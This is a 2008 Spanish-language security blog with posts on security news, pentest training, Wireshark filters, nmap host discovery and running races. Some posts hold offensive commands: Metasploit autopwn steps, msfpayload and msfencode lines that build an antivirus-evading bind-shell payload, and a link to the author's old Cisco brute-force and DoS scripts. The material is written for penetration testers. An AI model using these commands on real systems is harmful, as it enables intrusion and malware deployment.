miércoles, 24 de diciembre de 2008

Cómo Justificar el Presupuesto para el 2009

¿ Te redujeron el presupuesto de seguridad para el 2009 ? ¿ La seguridad dejó de ser importante para el negocio de la empresa ? Acá tenés algunos tips para seguir justificando tu trabajo el año que viene...


Para el 2009 tenemos predicciones de todo tipo, desde personal de IT que se dedicará al crimen después de haber perdido su trabajo, empleados descontentos que simplemente querrán provocarle daño a su empleador, y la crisis mundial que provocará que mayor cantidad de personas se dediquen al fraude en Internet.

Así que ya sabes, si te bajan el presupuesto para el 2009, es porque vos querés! :P

Blog de Matasano

"We are going to see an increase in stupid, stupid insider attacks. People who just get mad at their employers and try to inflict damage."

Fuente: Matasano

Jobless techies turning to crime

"The credit crunch will drive IT workers to increasingly use their skills to steal credit card data using phishing attacks and to abuse their privileged corporate computer access to sell off valuable financial and intellectual information, forensic experts have warned."

Fuente: silicon.com

Fraude 2005-2008: una evolución natural

"en el primer semestre de 2008 habíamos tratado más incidentes que en todo 2007"

Fuente: s21sec

Tendencias en el fraude online

"Indudablemente otro factor muy relevante es la presente y futura situación económica mundial, puesto con mucha probabilidad forzará a ciertas personas o grupos a intentar conseguir dinero de todas las formas posibles, con lo que, además de que las estadísticas lo indican, se augura un fuerte crecimiento de cualquier tipo de fraude en Internet."

Fuente: s21sec

Yes, Virginia, There Will Be More Attacks

"Virtually every projection we've seen indicates that attacks will continue to rise in frequency and sophistication in the coming year. As the economy drops, the crime wave rises, both inside the company and out."

Fuente: darkreading.com

New attack patterns emerge in 2009

"Botnets were just the beginning. The bad guys will continue to use these to try and steal your data, but more sophisticated attacks over the application layer and targeted network attacks are on the way."

Fuente: Arbor Networks

El spam alcanzará niveles record en 2009

"El volumen de correo basura podría incrementarse hasta el 95% debido al aumento de botnets."

Fuente: SiliconNews.es

jueves, 18 de diciembre de 2008

Circuito Kende - Ezeiza

El Domingo pasado corrí la 5a. fecha del Circuito Kende, una carrera de aventura con un trayecto de 10km por la zona rural de Ezeiza.


Esta fue mi segunda carrera de aventura, la primera fue la Merrell en Zárate donde se corría de noche. Si bien esta fue a plena luz del día, el terreno elegido era bastante duro, cruzando por partes de campo sembrado, desierto, bosques y en terrenos con grandes declives (sí, todo en Ezeiza).

No tenía demasiadas expectativas respecto a hacer un buen tiempo, ya que llegue a la carrera muy cansado, pero conseguí hacerlo en 47 minutos y 11 segundos, en la posición 27 de 103 corredores de la general de hombres, lo cual es un muy buen resultado para un principiante como yo.

Para lo que resta del año solamente planeo correr hasta la panadería. En el 2009 veremos cuales serán los próximos desafíos, pero mi objetivo principal va a ser finalmente correr una "maratón" (42km).

Un Resumen del 2008:

  • (Dic) Circuito Kende (Ezeiza) - 10km - 47:11
  • (Nov) Merrell Adventure Race (Zárate) - 7km - 38m aprox.
  • (Sep) Media Maratón de Buenos Aires - 21km - 01:50:33
  • (Jun) 10km de Buenos Aires - 10km - 49m aprox.
  • (May) Orígenes Media Maratón - 21km - 01:55:14
  • (Abr) Maratón UCEMA - 8km - 38:18
  • (Mar) La Nocturna - 7km - 37:23
Gracias a Gesolmina por bancarme con este "nuevo hobbie" :-)

martes, 16 de diciembre de 2008

¿ El PenTest ha Muerto ?

Esta es la interesante discusión que se ha desatado en el objetivo y no tendencioso mercado de la seguridad informática.


Brian Chess, uno de los co-fundadores de Fortify Software, lanzo una polémica predicción (Penetration Testing: Dead in 2009) respecto a la cercana muerte del PenTest, argumentando que la necesidad de los clientes apunta a herramientas preventivas mas que herramientas que solo reportan vulnerabilidades ya existentes. Vale aclarar que el negocio de Fortify esta en la prevención, mediante herramientas de análisis de código fuente.

Por otro lado, Ivan Arce, CTO de Core Security, respondió a la predicción de Chess fundamentando las razones (Twelve Reasons Pen Testing Won't Die) por la que la práctica del PenTest no va a desaparecer. También vale aclarar que el negocio de Core es el PenTest.

En mi opinión no existe la prevención total, por lo que la práctica del PenTest va a seguir siendo absolutamente necesaria, pero por otro lado también es cierto que si los clientes ponen dinero en un lugar van a tener que sacarlo de otro, y empresas como Fortify están viviendo un crecimiento importante.

Fuente:
- Penetration Testing: Dead in 2009
- Audio_Argument_for_Pen_Testing_s_Demise (Audio)
- Twelve Reasons Pen Testing Won't Die

jueves, 4 de diciembre de 2008

Port Scanning desde IOS

Recientemente se publicó en el SANS Reading Room un documento llamado "IOSMap: TCP and UDP Port Scanning on Cisco IOS Platforms".

La idea de escanear puertos desde un IOS no es nueva, pero es interesante como lo implementaron utilizando "la relativamente nueva" posibilidad de hacer scripting con TCL en IOS.

La herramienta se llama IOSMap y tiene un look and feel muy similar al de NMAP. Dentro de lo más interesante se encuentra la técnica para escanear puertos UDP, ya que como la implementación de TCL en IOS y la línea de comandos del IOS no provee formas para crear paquetes UDP, encontraron un workaround mucho más complejo con access-lists y IP SLa's que resulto ser efectivo.

Para ejecutar el script deberíamos cargarlo desde otra ubicación, como por ejemplo un TFTP, y luego este se ejecutaría en el IOS mostrando los resultados en la consola:

Router# tclsh tftp://iosmap.tcl 10.1.1.1-255 -p7-9,13,19,22-24,80,443

Tiempo atrás, cuando no contabamos con la posibilidad de usar TCL en IOS, lo más viable era realizar scripts que se logueen (con user/pass) en en router y ejecuten los comando automáticamente.

Hacia el año 2000 hice algunos scripts para pentestear desde routers Cisco, ya son bastantes viejos pero no por eso menos efectivos, asi que les dejo una breve descripción de los mismos por si les interesa probarlos:

getIOS.pl - Realiza conexiones al puerto 80 de un rango de red, y prueba por el bug del IOS HTTP Authorization Vulnerability. Muy efectivo, cuando encuentra un router vulnerable puede ejecutar un comando en el mismo, o guardar la configuración en un archivo HTML.

getCISCO.c - Realiza un brute force del login de un Router, puede probar una gran variedad de combinación de formas de brute force.

gethemp.c - Realiza un descubrimiento de una red realizando un PING desde el router a cada IP, especialemente útil para saltar desde un border router a la red interna.

ciscoBOMB.pl - Carga una combinación de routers, con sus respectivos user/pass, desde una base de datos y realiza un ataque de distribuído de DoS desde los mismos.

Pueden bajar este obsoleto código desde:
- http://www.kungfoosion.com.ar/cisco-pack.tar

Fuentes:
- IOSMap: TCP and UDP Port Scanning on Cisco IOS Platforms
- Cisco IOS Scripting with TCL
- TCL'ing Your Cisco Router

lunes, 1 de diciembre de 2008

Temanme! Soy un GPEN

Hace unos meses les contaba como "SANS Desafía a los CEH" con su nueva certificación, y hoy después de un durísimo exámen me he convertido en un GIAC Certified Penetration Tester :P


El desafío de SANS era para 50 CEH de todo el mundo que deseen probar sus conocimientos respecto a GPEN. En ese momento de entre varios cientos quede en el grupo que tendría la posibilidad de rendir el exámen, sin haber realizado el training oficial y sin tener ningún material de estudio. Esta certificación tiene un costo de 900 USD, que obviamente yo no tuve que pagar.

Hoy a la mañana tome el examen, 150 preguntas multiple-choice en 4 horas, y aprobé!

Solamente por el examen puedo decir que el nivel técnico de esta certificación es altísimo, y no tiene comparación con el de CEH. Sin ninguna duda me encantaría tomar el curso oficial.

SANS solicita a los que aprobamos hacer una review oficial de la certifiación, asi que en algún momento postearé algo más completo.

miércoles, 26 de noviembre de 2008

2 años de kungfoosion

Increíblemente este blog cumple 2 años de vida, no solamente me sorprende el hecho de tener un blog sino de que haya durado tanto tiempo.


Tenía pensado poner estadísticas de visitas, lugares de procedencia, los posts mas leídos, pero en conclusión solamente quiero agradecer a todos aquellos que leen este blog y me incentivan a que continúe con la ardua tarea del blogger :P

Gracias!

domingo, 23 de noviembre de 2008

ekoparty en Diario Perfil

Hoy Domingo, se publicó en el Diario Perfil un articulo titulado "Argentina, vivero de hackers que hacen temblar la Internet".

En una cobertura de 3 páginas sobre "el mundo underground de los hackers", el tema central de todas las notas es la ekoparty.

Muchas de las fotos publicadas fueron tomadas de mi álbum, como la de Alfredo y Nicolás antes de dar su charla, Dave haciendo Lockpicking, una foto de los asistentes a mi training y hasta una mía entregándole un premio a Federico. También hay varios comentarios del hacker Francisco Amato :P



Fuente: Diario Perfil (las fotos solo aparecen en la versión impresa)

sábado, 22 de noviembre de 2008

CEH Training

Esta semana dicte el curso oficial de CEH "Certified Ethical Hacking" de Ec-Council, y quería saludar a Bibiana, Hernán, Augusto, Pablo P., Pablo M., Roberto y Martín, con los cuales pase una semana muy divertida a puro hacking "ético" ;-)

martes, 18 de noviembre de 2008

Debutando en Zárate

El Sábado pasado participe de la Merrel Adventure Race, una carrera de aventura nocturna por los descampados de Zárate.

Esta fue mi primer carrera de aventura y estuvo excelente! Lamentablemente no pude correr los 20km, participe en un grupo de postas con 3 integrantes. Hace poco tiempo comencé a entrenar con un grupo de atletismo llamado Trotadores Urbanos, y como todavía integro el subgrupo de "los nuevos", no me autorizan a correr grandes distancias.



Tengo el Blog un poco colgado, pero volveré con todo dentro de poco! ;-)

martes, 11 de noviembre de 2008

La Matrix Corre en Windows

¿ Que pasaría si la Matrix corriera sobre Windows ? Acá tenés la respuesta...





Fuente: CollegeHumor (enviado a la lista de la ekoparty por Andy Riancho)

martes, 4 de noviembre de 2008

San Ignacio de la Iglesia de Emacs

Richard Stallman realizó ayer una presentación en el congreso de la nación, en donde en estos momentos se encuentran discutiendo un proyecto de ley de uso de software libre para la administración pública nacional.

Los linuxeros están todos locos ?



Gracias a Sepa y Juanma por la noticia.

domingo, 2 de noviembre de 2008

Nuevos Vectores de Ataques

Paul Asadoorian de PaulDotCom presento un webcast sobre nuevos vectores de ataques llamado "Late-Breaking Computer Attack Vectors".

El webcast tuvo los siguiente tópicos:

* MS08-067 - Slimy Network Worms
* Automated Metasploit - “autopwning"
* Listen to your keystrokes, they are talking to you
* Bypassing anit-virus software
* FAIL Of The Month (FOTM) (Linksys WRT300n vulnerabilities)

Estas son algunas notas de lo mas interesante:

*** Metasploit Autopwn


msf > load db_sqlite3
msf > db_create mynetwork
msf > db_import_nmap_xml mynetwork.xml
- o también -
msf > db_nmap -sS -T4 -O 192.168.1.0/24
msf > db_autopwn -p -e


*** Listen to your keystrokes, they are talking to you

Este es un nuevo método para capturar las teclas tipeadas mediante las ondas electromagnéticas emitidas por los teclados.


En esta URL: lasecwww.epfl.ch/keyboard/ pueden encontrar unos videos demostrativos.


*** Bypassing Anti-Virus Software

Lo mas interesante de este webcast fueron algunos ejemplos sobre como evadir la detección de programas Anti-Virus.

En PASS #1 es creado un payload malicioso con Metasploit 3.2, que escaneado por VirusTotal.com, es detectado por 1 de 36 AVs.

En PASS #2 el archivo payload.exe de PASS #1, es encodeado con msfencode, y el archivo resultante es detectado por 4 de 36 AVs!!

En PASS #3 el archivo payload.exe de PASS #1, es encodeado con PE-Scrambler de Nick Harbour, y el archivo resultante es detectado por 1 de 36 AVs.

En todos los casos el único Anti-Virus que detecto todos los payloads fue el programa gratuito AVG.


PASS #1
./msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe

PASS #2
./msfencode x86/shikata_ga_nai -i payload.exe -t exe > sgn-payload.exe

PASS #3
c:\Tools>PEScrambler.exe -i payload.exe -o pepayload.exe


* Link al Webcast - Link a los Slides

viernes, 31 de octubre de 2008

Los Trabajos de Seguridad Más Interesantes

SANS realizo una encuesta sobre cuales son los trabajos de seguridad que resultan más interesantes a los que trabajamos en este rubro.

La encuesta fue realizada a personal de gobierno y del ambito empresarial, con el objetivo de orientar a futuros profesionales en las diferentes ramas de seguridad en las que se podrían especializar.

TOP 10 - Personal de Gobierno

1. Information security crime investigator/forensics expert
2. System, network and/or Web penetration tester
3. Forensics analyst
4. Incident response, incident handler
5. Security architect
6. Vulnerability researcher
7. Network security engineer
8. Security analyst
9. Sworn law enforcement officer specializing in information security crime
10. CISO/ISO or director of security

TOP 10 - Personal de Empresas

1. System, Network, and/or Web penetration tester
2. Information security crime investigator/forensics expert
3. Forensics analyst
4. Vulnerability researcher
5. Application penetration tester
6. Security architect
7. CISO/ISO or director of security
8. Incident response, incident handler
9. Sworn law enforcement officer specializing in information security crime
10. Security evangelist

Fuente: GCN - The coolest IT security jobs

viernes, 24 de octubre de 2008

Se Buscan Programadores Para la PFA

La Policía Federal publicó gran parte de las presentaciones de las "Jornadas Sobre Técnicas de Investigación Relacionadas con Tecnología Informática", lamentablemnte la información esta disponible solo para los asistentes.

Por lo que me contaron este fue un excelente seminario con información verdaderamente interesante, pero tal vez el próximo año puedan sumar una charla sobre buenas prácticas de programación:


Supongo que algún hacker malvado, que quiera acceder a estas interesantes presentaciones, podría llegar a adivinar el usuario/password de acceso examinando cuidadosamente el título del evento: "VII SEMINARIO Y V JORNADAS - 2008", pero por supuesto no les recomiendo hacerlo ;)

miércoles, 22 de octubre de 2008

Filtros de Captura y Visualización

Conocer un poco sobre los "Capture Filters" y los "Display Filters" nos pueden ayudar a realizar un mejor análisis de trafico y por supuesto ahorrarnos mucho tiempo.


Los "Capture Filters", en la mayoría de los sniffers, utilizan la ya conocida sintaxis de BPF (Berkeley Packet Filter), mientras que los "Display Filters" pueden ser particulares para cada aplicación.

Hace un tiempo Tony Fortunato presento los "Top 10 Useful Filters", que son los siguientes:

1. Dirección IP:
"ip.addr == x.x.x.x"

2. Dirección MAC:
"eth.addr == xx:xx:xx:xx:xx:xx"

3. Protocolo ICMP:
"icmp"

4. No Mi Dirección MAC:
"eth.addr == xx:xx:xx:xx:xx:xx"

5. Protocolo DHCP:
"bootp"

6. Tiempo Delta Alto:
"frame.time_delta > 1"

7. Puerto TCP:
"tcp.port == x"

8. Puerto UDP:
"udp.port == x"

9. Análisis de RTT:
"tcp.analysis.ack_rtt > 1"

10. Tamaño de TCP:
"tcp.len > x && tcp.len < size="3">


Recientemente, Richard Bejtlich escribió un excelente articulo técnico llamado "Using Wireshark and Tshark display filters for troubleshooting". Dentro de las cosas mas interesantes podemos encontrar:

Ejemplo de un Capture Filter en Tshark (Wireshark en consola):

# tshark -i wlan0 -w sample.pcap host 192.168.2.103

Lo mismo pero con Tcpdump. En este caso hay que aclarar el Snaplen (tamaño del paquete)
ya que el default de Tcpdump es de 96 bytes:

# tcpdump -i wlan0 -s 1514 -w sample2.pcap host 192.168.2.103

En este caso estamos aplicando un Display Filter con el switch "-R" al mismo tiempo
que estamos capturando trafico:

# tshark -n -i wlan0 -w sample3.pcap -R 'ip.addr == 192.168.2.103'

Usuarios haciendo pedido de DNS que contienen la palabra "kungfoosion":

# tshark -n -i wlan0 -R 'dns.qry.name contains "kungfoosion"'

Búsqueda de la palabra "ftp" en el canal de comandos de FTP:

# tshark -n -r sample.pcap -R 'ftp.request.arg == "ftp"'

En este caso buscamos por usuarios que navegan con browsers que no son Firefox:

# tshark -i wlan0 -S -w sample5.pcap -x -R 'http.user_agent and !(http.user_agent contains "Firefox")'

Solamente visualizamos los comandos SMTP:

# tshark -n -r sample6.pcap -R 'smtp.req.command'

Durante el primer día de mi Network Security COMBAT Training trabajamos bastante con Capture Filters y especialmente con Display Filters, adicionalmente a lo que ya vimos, les recomiendo revisar los siguientes links que también los use durante mi training:

- Packet Life Cheat Sheets
- Wireshark Capture Filters
- Wireshark Display Filters
- Wireshark Display Filter Reference

lunes, 20 de octubre de 2008

Combinando Ataques Wireless y Web

Otro excelente webcast de SANS en donde se combinaron técnicas de ataques wireless y web para realizar un penetration testing.

Esta fue la primera parte del webcast "The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Testing Techniques", dictado por Kevin Johnson, Ed Skoudis y Joshua Wright.

La idea de este ataque combinado consistía en inyectar código HTML malicioso en redes wireless abiertas, tomar control de los browsers de los clientes, y luego desde allí atacar a otros sistemas de la red interna.

La inyección de código HTML la realizaban con la herramienta AirCSRF. Esta herramienta escucha los pedidos HTTP realizados por los clientes, y cuando detecta un pedido a un host víctima especificado por nosotros, por ejemplo www.google.com, se encarga de inyectar al final de la respuesta del servidor un código HTML.

Este código HTML puede ser javascript, o código que se encuentre en un servidor controlado por nosotros. Aquí es en donde entra en juego BeEF, la parte mas interesante del ataque.

BeEF, es un framework de ataque para browsers, que convierte al browser de un cliente en un zombie para luego utilizarlo en otros ataques, como por ejemplo escanear puertos, hacer un keylogging de lo que escribe el usuario, robar el contenido del clipboard, etc. (todo desde el browser)

El webcast se focalizó también en todo lo que se puede hacer desde el momento en que se obtiene control del browser del usuario con BeEF, y los posibles escenarios de ataques que podemos aprovechar en un penetration testing.

* Link al WebCast y al Link al Slide del WebCast

Herramientas Utilizadas:

- BeEF, "The Browser Exploitation Framework", por Wade Alcorn
- AirCSRF, “Air-Sea-Surf”, por Garland Glessner (no ha sido publicado todavía)
- Yokoso!, por Kevin Johnson, (próximamente será publicado, sirve para hacer un fingerprinting de la interfaz administrativa de un dispositivo)
- Samurai Web Testing Framework, por Kevin Johnson (este es un LiveCD orientado a hacer PenTesting a aplicaciones Web)
- Metasploit, por HD Moore
- AirPwn, por Toast (framework para inyectar paquetes 802.11)

miércoles, 15 de octubre de 2008

Lista de Correo de KungFooSion

Para todos los lectores de este Blog, interesados en discutir sobre seguridad de redes, análisis forense y kung-foo, los invito a suscribirse a la lista de correo de kungfoosion!


Esta lista fue creada para los asistentes del Network Security COMBAT Training en la ekoparty, pero me pareció interesante que los interesados en la temática (?) de este Blog también puedan participar.

La dirección es:
http://groups.google.com/group/kungfoosion

Suscribanse!

martes, 14 de octubre de 2008

Port Scanning con IP de Origen Spoofeada

La gente de securebits desarrolló una interesante idea para realizar un escaneo de puertos pero spoofeando la dirección IP de Origen.

Como se imaginarán, no es posible escanear puertos con la IP de Origen falsa ya que no nos llegarían las respuestas. Nmap tiene la posibilidad de utilizar Decoys, en donde envía los paquetes con las IP de Origen falsas, pero con el único propósito de generar mucho ruido para que el verdadero escaneo pase desapercibido frente a un IDS/IPS.

En principio, esta "nueva" técnica funcionaría solo en una red LAN, ya que antes de hacer el escaneo de puertos habría que realizar un ARP Poisoning. Básicamente le decimos a nuestra víctima que las direcciones IP falsas tienen la dirección MAC del atacante, entonces cuando la víctima envíe las respuestas de los escaneos falsos igualmente terminarán llegando al atacante.

Todo esto lo podemos hacer muy fácilmente usando Decoys con Nmap y cualquier herramienta de ARP Poisoning, pero también podríamos usar la nueva herramienta que esta gente desarrollo, y por supuesto leer el whitepaper que escribieron al respecto. No se puede decir que no le ponen ganas :P

Saludos al amigo Julio Cesar Fort que me hizo llegar esta noticia.

Fuente: Reliable Spoofed Source-IP Port Scanning

domingo, 12 de octubre de 2008

¿ Nuevos Ataques a TCP ?

Hace unos días Robert E. Lee y Jack C. Louis de Outpost24 anunciaron su investigación sobre fallas de diseño en el protocolo TCP que podrían ser explotadas para generar un DoS a un servicio, y en algunos casos a todo el servidor. Los detalles técnicos sobre sus descubrimientos serán publicados la semana que viene durante la conferencia finlandesa T2.

Es interesante como muchos han aprendido las lecciones de Kaminsky, y anuncian grandes descubrimientos que recién serán publicados durante la próxima conferencia de seguridad. Sin dudas esta metodología ha demostrado ser lucrativa, ya que como mínimo tienen a todo el mundo hablando de su empresa por algunas semanas.

Después esta el fenómeno de todos los investigadores que postean en sus blogs especulaciones sobre cual es la vulnerabilidad, intentando ser los primeros en descubrir cual es la falla que será presentada. Sin mencionar, que hoy en día todos los fallos descubiertos van a destruir la Internet, paso con lo del DNS, después lo de BGP, y ahora con TCP.

Respecto a la parte técnica hay poca información, pero en principio el ataque comienza con el atacante estableciendo una conexión TCP al servidor desde userland, por lo que el atacante no tiene que mantener el estado de la conexión, y quien gasta recursos es el servidor. Pero esto no basta para generar un DoS efectivo, razón por la que se cree que el ataque podría venir después del handshake, jugando con varios estados de TCP y con los timers de expiración de conexiones que ya no se encuentran activas.

En cualquier caso, los mayores riesgos parecen encontrarse en stacks y servicios pobremente implementados, y no tendremos otra opción que aguardar hasta la presentación de la semana que viene.

Más Info:
- Podcast con entrevista a Louis y Lee (adelantar hasta el minuto 5 para inglés, o ver transcript).
- Post de FX, Post de Fyodor, Post de breakingpoints, Post en Slashdot.

jueves, 9 de octubre de 2008

Cómo Optimizar el Host Discovery en Nmap

Fyodor publicó el video de su presentación en la ultima Defcon, y una de las cosas que me pareció mas interesante es cómo optimizar la etapa de Host Discovery en Nmap.



¿ Porqué Optimizar el Host Discovery ?


Antes de realizar un escaneo de puertos, Nmap intentará descubrir si los hosts objetivo se encuentran vivos. Por esta razón es que se vuelve fundamental que Nmap haga el descubrimiento lo mejor posible, ya que de lo contrario estaríamos escaneando los puertos a muchos menos hosts de los que realmente se encuentran vivos.

¿ Cómo Funciona el Host Discovery por Default ?

El Host Discovery de Nmap se conoce como "Nmap Ping", y básicamente lo que hace es enviar al objetivo un ICMP Echo Request (PING) y un paquete ACK al puerto 80.

El Nmap Ping tiene alrededor de 10 años de antigüedad, y era muy efectivo en la época en la que no había firewalls stateful.

La idea del ICMP Echo Request era recibir un ICMP Echo Reply, un PING, pero en la actualidad la mayoría de los firewalls tienen filtrado el PING. Mientras que la idea del ACK al puerto 80 era pasar el control de un firewall no-stateful (stateless), pero como se pueden imaginar hoy en día la mayoría de los firewalls son stateful.

Un firewall stateless, para permitir una conexión verificara la IP y los puertos de origen y destino, y si el paquete es un SYN. En el caso de denegar una conexión, verificara exactamente lo mismo, por lo que si enviamos un ACK, el firewall creerá que es una conexión ya establecida porque no tiene una tabla de estado para comprobar lo contrario, y lo dejara pasar.

¿ Cómo Optimizar el Host Discovery ?

Básicamente la idea seria crear nuestro propio "Nmap Ping", optimizándolo con diferentes técnicas que nos permitan obtener algún tipo de respuesta con la que podamos identificar a un host vivo.

En principio si queremos descubrir hosts detrás de un firewall stateful deberíamos utilizar paquetes SYN, ya que si utilizamos paquetes ACK y no hay un registro previo en la tabla de estado del firewall, el ACK sería descartado.

Esto lo podemos hacer con el switch "-PS". Ejemplo: "-PS80,25,22,443,21"

Por otro lado si queremos descubrir hosts detrás de un firewall stateless nos conviene utilizar paquetes ACK, ya que al no poseer una tabla de estado el firewall creerá que el paquete pertenece a una conexión ya establecida y lo dejará pasar.

Esto lo podemos hacer con el switch "-PA". Ejemplo: "-PA80,25,22,443,21"

En ambos casos, la pregunta clave es que puertos utilizar. En esta misma presentación, Fyodor publico un listado de los 10 puertos mas utilizados en Internet. También pueden ver este listado en mi post: "Los Puertos Más Usados En Internet"

Otra opción podría ser realizar el Discovery mediante puertos UDP, pero en este caso la idea seria buscar puertos cerrados que nos devuelvan un error ICMP Port Unreachable, ya que si enviamos un paquete sin contenido a un puerto UDP abierto, el sistema que lo reciba no sabrá que hacer con el y simplemente lo descartará.

Entonces la recomendación seria elegir un puerto UDP alto que probablemente no este en uso. Fyodor también recomienda sumar el puerto 53 (DNS), ya que muchos administradores suelen permitir este puerto en todo su rango de redes.

Esto lo podemos hacer con el switch "-PU". Ejemplo: "-PU33221,53"

Como vimos al comienzo, el clásico "Nmap Ping" utiliza un ICMP Echo Request que suele estar filtrado en los firewalls, por lo que es recomendable sumar al Echo Request otro tipo diferente de paquete ICMP, como por ejemplo Timestamp Request o Netmask Request.

Esto lo podemos hacer con los switchs "-PE" (Echo Req), "-PP" (Timestamp Req) o "-PM" (Netmask Req).

Otra opción también puede ser realizar un Protocol Ping. La idea aquí es enviar paquetes que utilicen diferentes protocolos, por default Nmap enviara 3 pruebas, un paquete ICMP (1), IGMP (2) y IP-in-IP (4), si estos protocolos no son soportados por el sistema operativo deberíamos recibir un error ICMP Protocol Unreachable, que nos permitirá conocer que el host esta vivo.

Esto lo podemos hacer con el switch "-PO".

En Conclusión

Si juntamos todo, lo que mas recomendable que deberíamos utilizar seria algo como esto:


nmap -sP -PE -PP -PS21,22,23,25,80,113,31339 -PA80,113,443,10042 --source-port 53 -T4 IP_de_TARGET


Aquí estamos realizando un Nmap Ping pero con paquetes ICMP Echo Request y Timestamp Request, también enviamos paquetes SYN y ACK a diferentes puertos del Top 10, y como recomendación de Fyodor también configuramos que todas las pruebas sean enviadas desde el puerto de origen 53 (DNS), esto con el switch "--source-port 53", ya que muchos firewalls pueden permitir conexiones desde este puerto.

Links Relacionados:
- Video de la presentación de Fyodor en Defcon
- Los Puertos Más Usados En Internet
- ¿ Porque Nmap es Lento con Redes Muy Filtradas ?

martes, 7 de octubre de 2008

Fotos de los ekoparty Trainings

No queda muy bien que como organizador diga esto, pero los trainings de la ekoparty estuvieron excelentes!! :-)

Nos sorprendió mucho la cantidad de asistentes, alrededor de 60, y que la mitad de ellos hayan sido de distintos países de Latinoamérica como Paraguay, Uruguay, Venezuela, Honduras, Perú, Chile, Colombia y otros...

Mas allá de alguna que otra critica, que siempre es bien recibida, prácticamente todos los asistentes quedaron muy conformes con todos los trainings, por lo que pudimos ver de las encuestas y de los comentarios que nos realizaran.

Pero no solamente la parte técnica de los trainings fue muy buena, sino que humildemente, creo que acertamos al haber elegido las aulas de Fundación Proydesa que son muy modernas.

Sobre mi Network Security COMBAT Training les puedo contar que fue el curso mas numeroso, con 20 asistentes. Al haber tanta de cantidad de personas, tuvimos que poner un plasma a mitad del aula para que todos pudieran visualizar las presentaciones.


El curso estuvo muy bueno y distendido, y personalmente debo agradecerle a todos aquellos con los que tuve el verdadero placer de compartir 2 días a puro Kung-Foo!! ;-)

Mas fotos de los trainings aquí:
- http://picasaweb.google.com/lpigner/EkopartyTrainings2008

sábado, 4 de octubre de 2008

ekoparty en Clarín: El Día Después

Hoy se publico un articulo en Clarín realizado por una periodista de este medio que estuvo cubriendo el evento. Las primeras repercusiones!!

Pueden ver la versión on-line de esta noticia en este link. También en el mismo articulo on-line aparecen dos videos, el primero es un mix de varios speakers, asistentes y organizadores, mientras que en el segundo aparece Domingo Montanaro, uno de los Speakers que vino desde Brasil.

- Video 1: Mix de Speakers, Organizadores y Asistentes.
- Video 2: Entrevista a Domingo Montanaro.

Próximamente voy a seguir posteando sobre le ekoparty, los trainings que fueron un verdadero exito y mucho mas!

ACTUALIZADO el Jueves 9 de Octubre


Ayer Miércoles, nuevamente en el suplemento de informática NEXT del diario Clarín se volvió a hacer mención de la ekoparty, esta vez con una nota de un estilo mas "under", pero igualmente bienvenida... :-)

- Version on-line de esta noticia.


viernes, 26 de septiembre de 2008

ekoparty en Clarin

Nuevamente ekoparty aparece en el gran diario argentino, y cada año nos brindan un poco más de espacio en la noticia ;)

Aquí pueden ver la versión on-line de esta noticia, y aquí la mención que tuvimos el año pasado.


Actualizado el Miercoles 1 de Octubre

Esto salió hoy en Clarin:

lunes, 22 de septiembre de 2008

Crónica de la Media Maratón de BA

Ayer corrí la media maratón de Buenos Aires, un recorrido de 21km por el microcentro porteño. Espectacular!


RECORRIDO

El recorrido estuvo muy bueno, rara vez uno puede tener la oportunidad de correr por el microcentro porteño, la largada fue a pocas cuadras de donde trabajo, por lo que era una sensación rara.

Largamos por Diagonal Norte, a pocas cuadras de Plaza de Mayo, luego recorrimos todo Puerto Madero, subimos por Av. Indepedencia hasta la Av. 9 de Julio, y luego llegamos nuevamente al punto de partida.

La subida por Independencia en los últimos kilómetros fue dura, pero increíblemente lo que mas me costo fue el último kilómetro cuando ya estaba llegando.

MI TIEMPO

Aspiraba a un tiempo mejor, pero la verdad es que últimamente no estuve entrenando demasiado, y también hay que tener en cuenta que había mucha gente corriendo, alrededor de 6000 personas, y el recorrido tenía muchas curvas y desniveles.

Mi tiempo neto fue de 01:50:33, el tiempo neto es el que marca el chip desde cuando se pisa la alfombra de largada hasta que se pisa la de llegada. Comparado con la media maratón que corrí en Mayo, donde hice 01:55:14, baje mi tiempo unos minutos, pero es muy difícil hacer comparaciones porque los recorridos eran muy diferentes.

ORGANIZACION

En general, las calles estuvieron bien cortadas y no hubo problemas con el transito, eso fue muy positivo.

Escuche que el año pasado hubo grandes problemas con la hidratación, pero este año lo han corregido porque no hubo ningún inconveniente, varios puntos con agua, y a media carrera y al final gatorade.

Lo que fue un verdadero papelón, fue la organización del guardarropa, a lo que debo dedicarle un capitulo aparte.

EL PAPELON

Llegue con un tiempo prudencial a la carrera porque quería dejar un bolso en el guardarropa, pero había tanta gente haciendo cola que cuando finalmente lo pude dejar, casi no me quedo tiempo para elongar. Esto lo sufrí mucho los primeros kilómetros, y después de la carrera.

Pero peor aun fue cuando finalizada la carrera la gente se agolpaba para retirar sus pertenencias, y una casi nula organización se vio totalmente superada.

Habré estado alrededor de 1 hora para retirar mi bolso, y solamente porque me metí a la carpa a buscarlo. Imaginense que después de 21km, con cansancio, calambres y mucho frío, los ánimos de todos los corredores estaban muy exacerbados, y simplemente reinaba el caos.

Finalmente, fuera del papelón, la media maratón de BA estuvo muy buena, principalmente por el recorrido, sino me quedaría con la de Orígenes.

miércoles, 17 de septiembre de 2008

COMBAT Training *Ultimas Vacantes*

En cualquier momento se cerrará la inscripción a mi COMBAT Training debido a la gran cantidad de personas que ya se anotaron. Si tienen ganas de asistir aprovechen las últimas vacantes!


Prácticamente todos los trainings que se presentarán en la ekoparty ya tienen una gran cantidad de asistentes, les recomiendo que no se pierdan esta oportunidad de tomar cursos de gran calidad a un precio muy bajo.

Cómo saben, estamos a dos semanas de la ekoparty, asi que hasta después del evento no se sorprendán si no posteo tan seguido como hasta ahora :-?

Relacionado:
- www.ekoparty.com.ar
- Más Info Sobre Mi Training
- Network Security COMBAT Training

jueves, 11 de septiembre de 2008

martes, 9 de septiembre de 2008

CEH versión 6

La semana pasada tuve la oportunidad de cursar la reciente versión 6 del CEH, y comparándola con la versión 5, debo decir que me lleve una muy buena impresión.


Primero me gustaría aclarar que esta certificación esta 100% orientada a herramientas. Conozco mucha que suele quejarse de ello, pero este es el objetivo de la CEH, conocer las herramientas, ni mas ni menos.

La idea de Ec-Council, es que después de CEH, el alumno combine a esta con las certificaciones ECSA/LPI, que brindarían los conocimiento de análisis y metodologías de PenTest complementarios.

La versión 6 de CEH, tiene 28 módulos nuevos, y algunos de los módulos existentes fueron actualizados. Los modulos nuevos incluyen Google Hacking, Bluetooth Hacking, VOIP Hacking, Spying Technologies, Spamming, etc...

